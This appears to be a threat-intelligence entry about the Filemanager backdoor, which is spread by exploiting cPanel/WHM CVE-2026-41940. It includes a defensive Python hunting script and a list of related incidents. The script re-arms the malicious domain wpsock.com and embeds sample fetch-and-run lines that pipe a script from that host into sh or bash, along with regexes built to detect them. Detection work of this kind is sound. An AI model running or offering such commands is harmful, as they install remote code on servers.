Filemanager backdoor delivered on compromised cPanel environments
Malware Activity
Summary
The Filemanager backdoor is being deployed on compromised cPanel/WHM systems, giving attackers remote command execution and shell access on the host. It is delivered through a shell script fetched from wpsock[.]com and is dropped as part of the ongoing exploitation of CVE-2026-41940. The backdoor also exposes file-management functions, widening attacker control over affected hosts.
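The summary names one concrete delivery indicator, a shell script fetched from wpsock[.]com. The following is an added hunting example, not code from the original report or from the researchers it cites: it re-arms the defanged domain and scores lines by how closely they match a fetch-and-run chain (fetch from the domain piped into a shell is high, a bare fetch is medium, any other mention of the domain is low). The sample lines are constructed for illustration, and the default file paths are assumed hunting locations on a cPanel host rather than paths named in the report.

```python
import glob
import re

# Defanged indicator as printed in the report, re-armed here for matching.
INDICATOR_DOMAIN = "wpsock[.]com".replace("[.]", ".")

# curl/wget followed (on the same command, not past a pipe or ';') by a URL
# whose host is the indicator domain or one of its subdomains.  The exact
# script path is not on the page, so any path under the domain is accepted.
FETCH_RE = re.compile(
    r"(?P<fetcher>curl|wget)[^\n|;]*?"
    r"(?P<url>https?://(?:[\w.-]+\.)?" + re.escape(INDICATOR_DOMAIN) + r"[^\s'\"|;]*)"
)
# "| sh" or "| bash" after the fetch: the fetched script is executed directly.
PIPE_SHELL_RE = re.compile(r"\|\s*(?:ba)?sh\b")
# Any mention of the domain at all (low confidence on its own).
DOMAIN_RE = re.compile(r"\b(?:[\w-]+\.)*" + re.escape(INDICATOR_DOMAIN) + r"\b")

# Assumed hunting locations (not from the report): shell history and cron
# entries are where a fetch-and-run chain typically persists.
DEFAULT_PATHS = [
    "/root/.bash_history",
    "/var/spool/cron/*",
    "/etc/cron.d/*",
    "/etc/cron.*/*",
]

# Constructed sample input (not real telemetry): a shell-history line, a cron
# line, two benign lines, and a web-log line whose referer names the domain.
SAMPLE_LINES = [
    "curl -fsSL http://wpsock.com/x.sh | sh",
    "* * * * * wget -qO- http://cdn.wpsock.com/x.sh | bash",
    "curl -s https://example.com/health",
    "ls -la /usr/local/cpanel/logs",
    '203.0.113.10 - - [11/May/2026:20:54:01 +0000] "GET /x.sh HTTP/1.1" 200 - "http://wpsock.com/"',
]


def classify(line):
    """Return (confidence, indicator) for a matching line, or None."""
    m = FETCH_RE.search(line)
    if m:
        # Only a pipe *after* the fetch counts as executing what was fetched.
        if PIPE_SHELL_RE.search(line[m.end():]):
            return "high", m.group("url")
        return "medium", m.group("url")
    d = DOMAIN_RE.search(line)
    if d:
        return "low", d.group(0)
    return None


def scan_lines(lines, source="<input>"):
    """Score every line; returns one dict per hit with its 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            confidence, indicator = result
            hits.append({"source": source, "line": n,
                         "confidence": confidence, "indicator": indicator})
    return hits


def scan_paths(paths):
    """Expand each glob and scan the files it names; unreadable files are skipped."""
    hits = []
    for pattern in paths:
        for path in glob.glob(pattern):
            try:
                with open(path, errors="replace") as fh:
                    hits.extend(scan_lines(fh, source=path))
            except OSError:
                continue
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES, source="constructed-sample"):
        print(hit)
    for hit in scan_paths(DEFAULT_PATHS):
        print(hit)
```

A low-confidence hit is only a lead: a domain string in a web log can come from scanners or referer spoofing, whereas a fetch piped into a shell from history or cron is the delivery chain the report describes and warrants a full incident review of the host, not just removal of the line.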
Related Happenings
Showboat Linux post-exploitation backdoor framework
Malware Activity
First: 21.05.2026 17:17
Last: 21.05.2026 17:17
Sources 1
About this happening:
The **Showboat** Linux malware has been identified as a **modular post-exploitation framework** used since **at least mid-2022**, raising the risk of persistent access on compromi...
Gremlin stealer modular toolkit evolution
Malware Activity
First: 15.05.2026 17:19
Last: 15.05.2026 17:19
Sources 1
About this happening:
The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation Wave
First: 04.05.2026 11:25
Last: 04.05.2026 11:25
Sources 1
How related:
"Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability," XLab researchers said.
About this happening:
Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CPanel CVE-2026-41940 mitigation guidance
Advisory/Mitigation
First: 30.04.2026 14:40
Last: 30.04.2026 14:40
Sources 1
About this happening:
cPanel issued mitigation guidance for **CVE-2026-41940** after fixes became available for **cPanel, WHM, and WP Squared**, urging customers to restart **cpsrvd** to reduce exposur...
CPanel and WHM emergency update for critical auth-bypass
Security Patch Release
First: 29.04.2026 18:51
Last: 29.04.2026 18:51
Sources 1
About this happening:
**WebPros International** released an **emergency update** for **cPanel** and **WHM** after a critical **authentication-bypass** flaw could expose supported installations to **una...
Timeline
- 11.05.2026 20:54 · 2 articles
Mr_Rot13 exploitation of cPanel CVE-2026-41940
Initial Disclosure: QiAnXin XLab identifies Mr_Rot13 as abusing CVE-2026-41940 in cPanel and WebHost Manager (WHM) to gain elevated control of compromised servers and deploy the Filemanager backdoor, with automated attacks and cybercrime activity observed worldwide and more than 2,000 attacker source IPs involved.
- cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor — thehackernews.com — 11.05.2026 20:54